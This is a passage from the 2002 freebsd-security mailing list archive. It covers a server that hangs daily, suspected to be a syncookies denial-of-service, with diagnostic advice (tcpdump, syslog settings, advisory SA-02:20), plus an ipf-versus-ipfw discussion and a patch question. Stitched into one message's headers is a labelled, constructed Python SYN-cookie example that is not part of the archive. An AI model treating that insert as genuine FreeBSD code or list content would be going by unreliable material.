k5SRGZeYmZqbnJ2bEoADoqKAEp6nqKmqq6ytrq+wsbKztLW2t7ICuru8vb6/wL0JAKPFpAnBycrL zM3Oz9DR0tPU1dbX2NnTE9zd3t/g4eLfxMbGAOIOGOsPAhMV6+sC8BgG7+v2GwEYDxsb8hMeYHAg MN64gwgTKlzIsKHDhxAjSpxIseLEQBgzatzIcaOCcqFIgfyokUGDkw0o/yBYgLKBA5YNDgCwcJIB AgooVeKsgOAkhJYNOgodSrSo0aNIkypdyrSp06dQo0olOirkAKscTS4QcPJlTAcOAMAk0LNmgAYL 
yjoo0GBgAwIATgZwIGCq3bt48+rdy7evX6rmzGVtYMFASggsCSxYIDZlg7MEGjDQGtfl2QUmZZ60 sADD38+gQ4seTbp0oMCCN5pEWaDxSQqN2UY+IJlyV64N2FaofLK16d/AgwsfLhr1OdWEV3tlEIgl hpMEnk9GWzksTpwQqhPfzr279+8cSQUGiZxxV5aYGSCWjPMASwZnKTjwCYD2W0AnD0wGz7+///95 fSReMSOVV5kBMJ0nGXhLFbyHQGQ1AVJBfvi1BOCFGGaoYXgiXVWOhxtB4EB2YCEgAFhgAXAiAiKq 6AACgICVHSAIlBgjinVtqOOOPG53wYdXEfhjj0QWaeSRQw153JBINunkkzqSFIiUUFZp5ZVYZqnl llx26eWXYIYp5phklmnmmWgCEAIAOw== ------=_NextPart_94915C5ABAF209EF376268C8 Content-Type: image/gif; name="barrainferior-d.gif" Content-Transfer-Encoding: base64 Content-Description: barrainferior-d.gif Content-Id: <147590-22002252219104897211@3> R0lGODlhhQEWANUAAP///+/v79/f38zMzL+/v66urpmZmf+AAO94AIyMjIaGht9wAHx8fMxmAHNz c79gAK9YAGZmZp9QAFlZWY9IAFNTU4BAAH9AAEtLS0NDQ3A4AG84AGYzADo6OlcsADMzM1AoACkp KUAgADodACAgIDAYABkZGSAQABAQEAkJCRAIAAAAAP4BAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAUUACwALAAAAACFARYAAAb/wIJw SCwaj8ikcslsOp/QqHRKrVqv2Kx2uzR4v+CweEwum8/otHrNbrvf8Lh8Tq/b72eGfs/v+/+AgYKD hIWGh4iJiouMjY6PkJGSk4MRlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+fGLKztLW2t7i5uru8 vb6/wMHCw8TFxsfIycrLux/Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm59cm6uvs7e7v8PHy8/T1 9vf4+fr7/O0YEyHe/QvY792BAwUTKlzIUN6KhxAjSpxIsaLFixgzatzIsaPHjyBDSnRgIARFkiZF UhQhQqXLlzBjypxJs6ZNkCFqfYhIAoMl/wwoVsgKuuKDLIgdMJB4mHNWBxS0MqRY0ZMW0lkKSp40 MGHWUqgYIB7leHDFhYNo0SKQoGKFiLQHFoB4eEICgrQX3EK4e1CECgkL0Ob9i3aBhYdw0zYo8fBB 4oMN5kZkMACAZQIPGQiwHMBAUAKWQ4cWwOCm6dOoUws1oMCBg6wOHmIwkGDChAQGOkwwEHZFVgM7 UdCeultBVwwdQrDGwMBAhgqsI8xakaJ5awe4U440wMC1l+ReIIYne8DsAQks+4pocGDDChUsWW4o q+IuBZbsL7xFwCG+CscQxHfCCuwFCEJ+K6gnwXkizIdAY+2JsGADInBwUFuZATBABRlksP8TAxpy WAAAmIHmQAYOaPhcAADspNqLMMbI0Wy9+ZabcJ49RIIXOyaQQgcGRGBAbLuFtSNwISRJgnKxdXDi d0kmuUIG3EGE0lYpKVfSeCtwqVFZZ+WVYHnmianBA2g6dkB6DUDk2AVnIZDmAx6UFdF+EIEQ15gP hYkYmY61dNYDD7HX0kMsZiBRohBZ9gFoimZA4kOQymjppZjSaCVvWkbkRQi7ddAcCigl4OMKWrrm WgVMQqRld6quFsGm2kV0JXVefMCllxmBeYCYdvpJwQENwHnWmm8t4Oav8y1g7AUjXBhRCdKuoGeb 
wf76J4SCHkDoCoFCtFkFEo37EAqWoVD/qaSYrVAppvDGe9psESRJZY5ZRZACCkKWJhxuExRFG1cP pYBbB0utgEKrEGWlVMGo0vZBks3VumkGSfaL48Sdklfmth8v+AAI6a1J4AEQWGBBYBfUdwAFKltQ V1wxtzQhCBrcNVe2wAJq8qDcRlDaBAAEkIAesxIdgAMRVGaAuwBEOinUispr9dUwzQYGAynxC8YE U62wmwEmPPQbUSuYIOQXDjD8kNphPPRBc2BY/BBJX9Q2VQa/fdERmitw8AAHjX0rOOF/zYkmYypc kOZd7p1AwZyMcQBBmoSvsMEDCCwQYOEPHQ76CpNX/gAFD5WeQLtUEuB6Ag9lUIAAARAQXPAKq+/0 KOy4E+Ai1sAHPyNvF6kjfEcdx3hCfCDcxdjx0EcvPU2aTv9RGAp0YOmxcQ1u/ffghy/++OSXb/75 6Kev/vrst+/++/DHL//89Ndv//3456///vz3f3UQADs= ------=_NextPart_84815C5ABAF209EF376268C8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 21:50: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from utility.clubscholarship.com (utility.clubscholarship.com [198.78.70.175]) by hub.freebsd.org (Postfix) with ESMTP id 108E937B413 for ; Tue, 7 May 2002 21:49:48 -0700 (PDT) Received: from localhost (root@localhost) by utility.clubscholarship.com (8.11.6/8.11.6) with ESMTP id g484kbi17930; Tue, 7 May 2002 21:46:37 -0700 (PDT) (envelope-from root@utility.clubscholarship.com) Date: Tue, 7 May 2002 21:46:37 -0700 (PDT) 
From: Patrick Thomas
To: Jason Stone
Cc:
Subject: Re: what does a syncookies attack look like ?
In-Reply-To: <20020507192651.T6630-100000@walter>
Message-ID: <20020507214035.B8475-100000@utility.clubscholarship.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> What evidence do you have that you're being attacked? Is it possible that
> something on the system has just been misconfigured or something and is
> eating up all your resources?

The reason we suspect it is an attack - or at least an outside influence -
is that the crash/hang occurs at exactly the same time every day. Of
course the first reaction to that would be "probably a cron job" ...
however we have ruled that out by setting the system time to the time that
it crashes .. at times of the day with analogous (or greater) load than
when it really does crash. When we artificially set the time to the "zero
hour" nothing happens.

However, when that time comes up in the "real world", the server hangs
like I described.

So, much like you suggested, I was running a once-per minute cron job that
tested the following:

    netstat -m >> /tmp/log
    ps auxw | wc -l >> /tmp/log
    ps auxw >> /tmp/log
    vmstat -m >> /tmp/log
    vmstat 1 4 >> /tmp/log
    pstat -s >> /tmp/log
    vmstat -z >> /tmp/log

and there is no interesting output. Even the output one minute before the
crash is completely uninteresting. swap usage is _literally_ _zero_.
About 1gig total free memory ... and then 30-60 seconds later, before the
next cron job can run and collect those stats again, it crashes - always
at the exact same time.

Any other metrics I should be looking at besides the ones I have ?

tcpdump on the machine itself and on the firewall reveals nothing
interesting. Not an interesting level of traffic in terms of transactions
or bandwidth.
We're going crazy here trying to figure it out. We are
running the very first 4.5-RELEASE, and we have so far only patched the
included sshd, and done the chmod on the `keylink` file or whatever it was
that was suid root. Otherwise it is a stock very first release of
4.5-RELEASE.

thanks for any suggestions/help,

PT

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 7 23:57:53 2002
Delivered-To: freebsd-security@freebsd.org
Received: from host185.dolanmedia.com (host185.dolanmedia.com [209.98.197.185]) by hub.freebsd.org (Postfix) with SMTP id 720FD37B400 for ; Tue, 7 May 2002 23:57:47 -0700 (PDT)
Received: (qmail 41607 invoked by uid 0); 8 May 2002 06:57:47 -0000
Received: from greg.panula@dolaninformation.com by proxy with qmail-scanner-0.96 (. Clean. Processed in 0.357568 secs); 08 May 2002 06:57:47 -0000
X-Qmail-Scanner-Mail-From: greg.panula@dolaninformation.com via proxy
X-Qmail-Scanner-Rcpt-To: root@utility.clubscholarship.com,freebsd-security@freebsd.org
X-Qmail-Scanner: 0.96 (No viruses found. Processed in 0.357568 secs)
Received: from unknown (HELO mail.dolanmedia.com) (10.1.1.23) by 10.1.1.10 with SMTP; 8 May 2002 06:57:46 -0000
Received: from dolaninformation.com (10.1.1.135) by mail.dolanmedia.com (Worldmail 1.3.167); 8 May 2002 01:57:46 -0500
Message-ID: <3CD8CC69.47021F06@dolaninformation.com>
Date: Wed, 08 May 2002 01:57:45 -0500
From: Greg Panula
Reply-To: greg.panula@dolaninformation.com
Organization: Dolan Information Center Inc
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Patrick Thomas
Cc: freebsd-security@freebsd.org
Subject: Re: what does a syncookies attack look like ?
References: <20020507214035.B8475-100000@utility.clubscholarship.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Patrick Thomas wrote:
>
> The reason we suspect it is an attack - or at least an outside influence -
> is that the crash/hang occurs at exactly the same time every day. Of
> course the first reaction to that would be "probably a cron job" ...
> however we have ruled that out by setting the system time to the time that
> it crashes .. at times of the day with analogous (or greater) load than
> when it really does crash. When we artificially set the time to the "zero
> hour" nothing happens.
>
> However, when that time comes up in the "real world", the server hangs
> like I described.
.
.
.
> tcpdump on the machine itself and on the firewall reveals nothing
> interesting. Not an interesting level of traffic in terms of transactions
> or bandwidth. We're going crazy here trying to figure it out. We are
> running the very first 4.5-RELEASE, and we have so far only patched the
> included sshd, and done the chmod on the `keylink` file or whatever it was
> that was suid root. Otherwise it is a stock very first release of
> 4.5-RELEASE.
>
> thanks for any suggestions/help,
>

The answer to your problem is probably related to security advisory:
FreeBSD-SA-02:20 "syncache/syncookies denial of service"

The full text of the advisory can be found at:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02%3A20.syncache.asc

All of the security advisories can be found at:
http://www.freebsd.org/security/index.html#adv

A google search for 'syncookies' or 'synflooding' should turn up some useful
information about SYN flooding and the use of syncookies as a defense.

I found a quick description at:
http://www.incidents.org/diary/november01/110801.php

"On some operating systems it is possible to configure the
kernel to use a SYN flood protection mechanism known as
SYNcookies. The idea is that, if the server should detect
a SYN flood attack, it can stop keeping state on waiting-to-be-completed
three way handshakes, and switch to a challenge-response
mechanism for accepting new connections.

When in "flood protection mode" the server embeds a cryptographically
strong "cookie" in the TCP header of each SYN-ACK it sends. This
cookie is a state-keeping mechanism. If a real client is actually
engaged on the other end of the connection, the client will
automatically return the cookie to the server when responding
with the final ACK of the three-way-handshake. Thus, the server
can completely forget about the connection after sending the
SYN-ACK, because all the state data required to establish the
new connection arrives in the final ACK."

Good luck,
Greg

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 8 0: 5:10 2002
Delivered-To: freebsd-security@freebsd.org
Received: from utility.clubscholarship.com (utility.clubscholarship.com [198.78.70.175]) by hub.freebsd.org (Postfix) with ESMTP id 4BC3037B409 for ; Wed, 8 May 2002 00:05:05 -0700 (PDT)
Received: from localhost (root@localhost) by utility.clubscholarship.com (8.11.6/8.11.6) with ESMTP id g4871pA22132; Wed, 8 May 2002 00:01:51 -0700 (PDT) (envelope-from root@utility.clubscholarship.com)
Date: Wed, 8 May 2002 00:01:51 -0700 (PDT)
From: Patrick Thomas
To: Greg Panula
Cc:
Subject: Re: what does a syncookies attack look like ?
In-Reply-To: <3CD8CC69.47021F06@dolaninformation.com>
Message-ID: <20020507235944.S8475-100000@utility.clubscholarship.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

thank you - however based on my description of the crash (kernel seems to
be running, userland is not) people here seem to feel it is not a
syncookies attack. They seem to think a syncookies attack would be a much
harder crash/lock.

This last email of mine was simply describing why I think it is an attack
in general - just not sure yet what kind.

Do you have other information that leads you to believe a syncookies
attack could indeed lead to the kind of strange lockup I am describing ?

thanks.

On Wed, 8 May 2002, Greg Panula wrote:

> Patrick Thomas wrote:
> >
> > The reason we suspect it is an attack - or at least an outside influence -
> > is that the crash/hang occurs at exactly the same time every day. Of
> > course the first reaction to that would be "probably a cron job" ...
> > however we have ruled that out by setting the system time to the time that
> > it crashes .. at times of the day with analogous (or greater) load than
> > when it really does crash. When we artificially set the time to the "zero
> > hour" nothing happens.
> >
> > However, when that time comes up in the "real world", the server hangs
> > like I described.
> .
> .
> .
> > tcpdump on the machine itself and on the firewall reveals nothing
> > interesting. Not an interesting level of traffic in terms of transactions
> > or bandwidth. We're going crazy here trying to figure it out. We are
> > running the very first 4.5-RELEASE, and we have so far only patched the
> > included sshd, and done the chmod on the `keylink` file or whatever it was
> > that was suid root. Otherwise it is a stock very first release of
> > 4.5-RELEASE.
> >
> > thanks for any suggestions/help,
> >
>
> The answer to your problem is probably related to security advisory:
> FreeBSD-SA-02:20 "syncache/syncookies denial of service"
>
> The full text of the advisory can be found at:
> ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02%3A20.syncache.asc
>
> All of the security advisories can be found at:
> http://www.freebsd.org/security/index.html#adv
>
>
> A google search for 'syncookies' or 'synflooding' should turn up some useful
> information about SYN flooding and the use of syncookies as a defense.
>
> I found a quick description at:
> http://www.incidents.org/diary/november01/110801.php
>
> "On some operating systems it is possible to configure the
> kernel to use a SYN flood protection mechanism known as
> SYNcookies. The idea is that, if the server should detect
> a SYN flood attack, it can stop keeping state on waiting-to-be-completed
> three way handshakes, and switch to a challenge-response
> mechanism for accepting new connections.
>
> When in "flood protection mode" the server embeds a cryptographically
> strong "cookie" in the TCP header of each SYN-ACK it sends. This
> cookie is a state-keeping mechanism. If a real client is actually
> engaged on the other end of the connection, the client will
> automatically return the cookie to the server when responding
> with the final ACK of the three-way-handshake. Thus, the server
> can completely forget about the connection after sending the
> SYN-ACK, because all the state data required to establish the
> new connection arrives in the final ACK."
>
> Good luck,
> Greg
>
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 8 1:10:49 2002
Delivered-To: freebsd-security@freebsd.org
Received: from host185.dolanmedia.com (host185.dolanmedia.com [209.98.197.185]) by hub.freebsd.org (Postfix) with SMTP id 0E4B237B40B for ; Wed, 8 May 2002 01:10:44 -0700 (PDT)
Received: (qmail 72503 invoked by uid 0); 8 May 2002 08:10:43 -0000
Received: from greg.panula@dolaninformation.com by proxy with qmail-scanner-0.96 (. Clean. Processed in 0.316654 secs); 08 May 2002 08:10:43 -0000
X-Qmail-Scanner-Mail-From: greg.panula@dolaninformation.com via proxy
X-Qmail-Scanner-Rcpt-To: root@utility.clubscholarship.com,freebsd-security@freebsd.org
X-Qmail-Scanner: 0.96 (No viruses found. Processed in 0.316654 secs)
Received: from unknown (HELO mail.dolanmedia.com) (10.1.1.23) by 10.1.1.10 with SMTP; 8 May 2002 08:10:42 -0000
Received: from dolaninformation.com (10.1.1.135) by mail.dolanmedia.com (Worldmail 1.3.167); 8 May 2002 03:10:42 -0500
Message-ID: <3CD8DD82.924A1DCB@dolaninformation.com>
Date: Wed, 08 May 2002 03:10:42 -0500
From: Greg Panula
Reply-To: greg.panula@dolaninformation.com
Organization: Dolan Information Center Inc
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Patrick Thomas
Cc: freebsd-security@freebsd.org
Subject: Re: what does a syncookies attack look like ?
References: <20020507235944.S8475-100000@utility.clubscholarship.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Nope, I've been lucky enough to not experience any strange lock-ups that
weren't my own doing. And Jason covered those; file & process descriptors.
You just mentioned syncookie and you hadn't applied the related patch.
So, I made a blind guess.

When the server crashes is the console responsive?

You'll probably need to gather tcpdumps from a couple of crashes to allow
you to find a pattern/attack traffic. Just remember to set the snarf
length to 1500. Something like 'tcpdump -s 1500 -w dump1.tcp -n host '
will write the raw stream of all traffic involving your server's ip
address to dump1.tcp and then you can use ethereal to browse thru the
traffic. From there it is pretty much a process of elimination; eliminate
the legitimate traffic and then figure out what the questionable traffic
is. Probably not what you want to hear, just because you'll have to
suffer thru at least two more crashes.

As for what an actual syn attack might look like, snort's
database/rule-set is probably the best bet. You might even be able to
feed a captured stream thru snort and have it spit out what it thinks.

Optionally you could try applying the workaround of disabling syncookies,
probably a long-shot but shouldn't hurt to try.

Are there any other machines on your network that are accessing the
crashing server at the "zero hour"?
Could it be possible they are kicking off a fatal process?

You could also try an entry like:
    *.* /var/log/messages
and/or
    *.* /dev/console
in your /etc/syslog.conf. Maybe you'll get lucky and capture a useful
message before the server crashes. Remember to HUP syslogd after making
the change.

Good luck,
Greg

Patrick Thomas wrote:
>
> thank you - however based on my description of the crash (kernel seems to
> be running, userland is not) people here seem to feel it is not a
> syncookies attack. They seem to think a syncookies attack would be a much
> harder crash/lock.
>
> This last email of mine was simply describing why I think it is an attack
> in general - just not sure yet what kind.
>
> Do you have other information that leads you to believe a syncookies
> attack could indeed lead to the kind of strange lockup I am describing ?
>
> thanks.
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 8 1:55:41 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 0500437B405 for ; Wed, 8 May 2002 01:55:39 -0700 (PDT)
Received: 8.12.2-(Neptune)
Received: 8.12.2-(Venus)
Received: 8.12.2-(Neptune)
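[Added example, not part of any message in this archive and not FreeBSD's syncache/syncookie code: the stateless handshake from the incidents.org description quoted in the "what does a syncookies attack look like ?" thread, written out in Python. The cookie layout (5-bit time slot, 3-bit MSS index, 24-bit HMAC-SHA256 tag), the MSS table, the secret and the addresses are assumptions constructed for illustration.]

```python
"""Stateless SYN-cookie handshake (illustrative layout, not FreeBSD's)."""
import hashlib
import hmac
import socket
import struct

# Assumed 3-bit MSS table: the cookie can only carry an index, so the
# client's MSS is rounded down to one of these eight values.
MSS_TABLE = (216, 536, 1024, 1220, 1360, 1440, 1452, 1460)
SLOT_SECONDS = 64      # cookie lifetime granularity (assumption)
MAX_AGE_SLOTS = 1      # accept the current time slot and the previous one
M32 = 0xFFFFFFFF


def _tag24(secret, conn, client_isn, slot, mss_idx):
    """24-bit MAC binding the cookie to the 4-tuple, client ISN and time slot."""
    src, sport, dst, dport = conn
    msg = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack(
        "!HHIIB", sport, dport, client_isn, slot, mss_idx)
    digest = hmac.new(secret, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_cookie(secret, conn, client_isn, client_mss, now):
    """On SYN: return the server ISN for the SYN-ACK. No per-connection state is kept."""
    slot = int(now) // SLOT_SECONDS
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= client_mss), default=0)
    tag = _tag24(secret, conn, client_isn & M32, slot, mss_idx)
    return ((slot & 0x1F) << 27) | (mss_idx << 24) | tag


def check_cookie(secret, conn, ack_seq, ack_ack, now):
    """On final ACK: return the negotiated MSS if the cookie is ours, else None.

    ack_seq is the ACK segment's sequence number (client ISN + 1) and
    ack_ack its acknowledgement number (server ISN + 1), both mod 2**32.
    """
    client_isn = (ack_seq - 1) & M32
    cookie = (ack_ack - 1) & M32
    slot_bits, mss_idx, tag = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    current = int(now) // SLOT_SECONDS
    for age in range(MAX_AGE_SLOTS + 1):
        slot = current - age
        if slot < 0 or slot & 0x1F != slot_bits:
            continue  # cookie was not minted in this time slot
        expected = _tag24(secret, conn, client_isn, slot, mss_idx)
        if hmac.compare_digest(expected.to_bytes(3, "big"), tag.to_bytes(3, "big")):
            return MSS_TABLE[mss_idx]
    return None


def handshake_demo():
    """Run constructed handshakes and return what the server decides for each."""
    secret = b"constructed-demo-secret"                   # constructed value
    conn = ("192.0.2.10", 40000, "198.51.100.5", 80)      # documentation addresses
    spoofed = ("203.0.113.9", 40000, "198.51.100.5", 80)  # different claimed source
    now, client_isn = 1020841200, 0xFFFFFFFF              # ISN chosen to exercise wrap-around
    cookie = make_cookie(secret, conn, client_isn, 1400, now)
    seq, ack = (client_isn + 1) & M32, (cookie + 1) & M32
    return {
        "legitimate": check_cookie(secret, conn, seq, ack, now + 3),
        "spoofed_source": check_cookie(secret, spoofed, seq, ack, now + 3),
        "guessed_ack": check_cookie(secret, conn, seq, 0, now + 3),
        "expired": check_cookie(secret, conn, seq, ack, now + 200),
    }


if __name__ == "__main__":
    for case, result in handshake_demo().items():
        print(f"{case:15s} -> {result}")
```

[Only the ACK that echoes a cookie minted for the same 4-tuple, client ISN and a recent time slot is accepted; the server holds nothing between the SYN-ACK and that ACK, which is why a flood of unanswered SYNs cannot fill a connection queue.]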
From: "Nielsen"
To: "Tom Limoncelli" ,
References: <3CD8558E.2FA68C36@lumeta.com>
Subject: Re: ipf vs. ipfw
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20020508085539.0500437B405@hub.freebsd.org>
Date: Wed, 8 May 2002 01:55:39 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> I use ipf, and recently some people have asked me about ipfw that I
> couldn't answer. Hopefully people on this list can enlighten me.

I use both, on the same machines (!). There are features that I need from
both.

> Are ipf and ipfw different interfaces to the same in-kernel filtering
> mechanism? It doesn't look like it is, but I'd like that confirmed.

Nope, totally different. In my experience ipf (and related ipnat) seem to
go deeper into the kernel and play more tricks. In cases they bypass
portions of the normal routing etc... I prefer ipnat (to natd) for NAT as
it's all done in kernel mode.

ipfw has dummynet and all that. Also the forwarding mechanism (which we
use here for source based routing) is cleaner there in my opinion.

ipf has a more complete syntax for the firewall. It also makes it easier
to add and remove rules at will without knowing the previous structure of
the firewall. We use this for jails a lot.

> Why does FreeBSD have both? Is it because ipf is generic (ported to
> Solaris, IRIX, OpenBSD, etc) and ipfw is specifically designed for
> FreeBSD?

That's what I thought. It's nice to have a choice too.

Nate

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 8 2:12:57 2002
Delivered-To: freebsd-security@freebsd.org
Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 4CF3037B404 for ; Wed, 8 May 2002 02:12:50 -0700 (PDT)
Received: from cairo.anu.edu.au (localhost [127.0.0.1]) by cairo.anu.edu.au (8.12.0/8.12.0) with ESMTP id g489Cj3g019047; Wed, 8 May 2002 19:12:46 +1000 (EST)
Received: (from avalon@localhost) by cairo.anu.edu.au (8.12.0/8.12.0.Beta16) id g489CjUv019045; Wed, 8 May 2002 19:12:45 +1000 (EST)
From: Darren Reed
Message-Id: <200205080912.g489CjUv019045@cairo.anu.edu.au>
Subject: Re: ipf vs. ipfw
To: aragon@phat.za.net (Aragon Gouveia)
Date: Wed, 8 May 2002 19:12:45 +1000 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG, tal@lumeta.com (Tom Limoncelli)
In-Reply-To: <001101c1f626$10d61420$01000001@aragon> from "Aragon Gouveia" at May 08, 2002 02:19:48 AM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

In some mail from Aragon Gouveia, sie said:
>
> Also, ipfw is the interface to FreeBSD's very cool dummynet(4) traffic
> shaper.
>
> I haven't used ipf personally. Does it have builtin support for traffic
> shaping? Weighted Fair Queueing?

No, ipf does not do this.

Darren

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 8 2:16:24 2002
Delivered-To: freebsd-security@freebsd.org
Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 85C5237B408; Wed, 8 May 2002 02:16:16 -0700 (PDT)
Received: from cairo.anu.edu.au (localhost [127.0.0.1]) by cairo.anu.edu.au (8.12.0/8.12.0) with ESMTP id g489GD3g019357; Wed, 8 May 2002 19:16:13 +1000 (EST)
Received: (from avalon@localhost) by cairo.anu.edu.au (8.12.0/8.12.0.Beta16) id g489GDec019355; Wed, 8 May 2002 19:16:13 +1000 (EST)
From: Darren Reed
Message-Id: <200205080916.g489GDec019355@cairo.anu.edu.au>
Subject: Re: ipf vs. ipfw
To: baldur@foo.is (Baldur Gislason)
Date: Wed, 8 May 2002 19:16:13 +1000 (Australia/NSW)
Cc: tal@lumeta.com (Tom Limoncelli), freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG
In-Reply-To: <20020507231529.8B55C2744@tesla.foo.is> from "Baldur Gislason" at May 07, 2002 11:15:17 PM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

In some mail from Baldur Gislason, sie said:
>
> ipfw is in no way related to the linux firewalls (ipfwadm, ipchains or
> iptables). It is a specially designed firewall for FreeBSD. It isn't
> dependent on ipf, it has its own in-kernel mechanism. It has a totally
> different syntax. Why FreeBSD has both I can't answer, ipfw and ipf each have
> their own advantages over each other. In my experience, ipfw is easier to
> work with, but it's also limited in some ways. Ipf tends to have a more
> complex ruleset, and more stateful functionality (ipfw can do stateful
> filtering but ipf has more customisable state keeping rules IIRC), however
> ipfw does have the ability to apply rules by uid's if you're doing a firewall
> for the local machine, and it does have a packet/byte counter for each
> individual rule. I'm not sure how this is with ipf as I haven't used it as
> much as I have used ipfw.

ipf has a completely separate set of rules you can use for accounting
and is minus any os-specific hacks (such as uid filtering)

ipfw does share its roots with the linux ipfw but linux long ago dropped
its one and the freebsd one is now much different.

ipf used to be more "leading edge" than any of the others and hence
offered more features and a bigger coolness factor but I've been slack
for the last year or two on that front.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 8 5:55:43 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mailhub.isternet.sk (smtp.isternet.sk [195.72.0.60]) by hub.freebsd.org (Postfix) with ESMTP id 345DF37B410 for ; Wed, 8 May 2002 05:55:32 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by mailhub.isternet.sk (Postfix) with ESMTP id E083C34C for ; Wed, 8 May 2002 15:00:05 +0200 (CEST)
Received: from branoold (urpin.isternet.sk [195.72.0.1]) by mailhub.isternet.sk (Postfix) with SMTP id 6B32F346 for ; Wed, 8 May 2002 15:00:03 +0200 (CEST)
Message-ID: <064601c1f68f$ae8e4480$c28c630a@bb.ubp.sk>
From: "[brano]"
To:
References: <3CD8558E.2FA68C36@lumeta.com>
Subject: FreeBSD-SA-02:08
Date: Wed, 8 May 2002 14:55:47 +0200
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Virus-Scanned: by AMaViS snapshot-20010714
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hi all,

I have FreeBSD 4.5-RELEASE and I compile my own kernel. Do I need to apply
patch FreeBSD-SA-02:08 ?

I'm looking at file src/sys/conf/newvers.sh which has:

# $FreeBSD: src/sys/conf/newvers.sh,v 1.44.2.20.2.1 2002/01/28 06:42:16 murray Exp $

and in the patch file is written 1.44.2.17.2.5 Revision

then do I need to apply this patch ?

sorry for my English ;-)

thanks

Brano from Slovakia

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 8 8:56:52 2002
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 6335A37B404; Wed, 8 May 2002 08:56:39 -0700 (PDT)
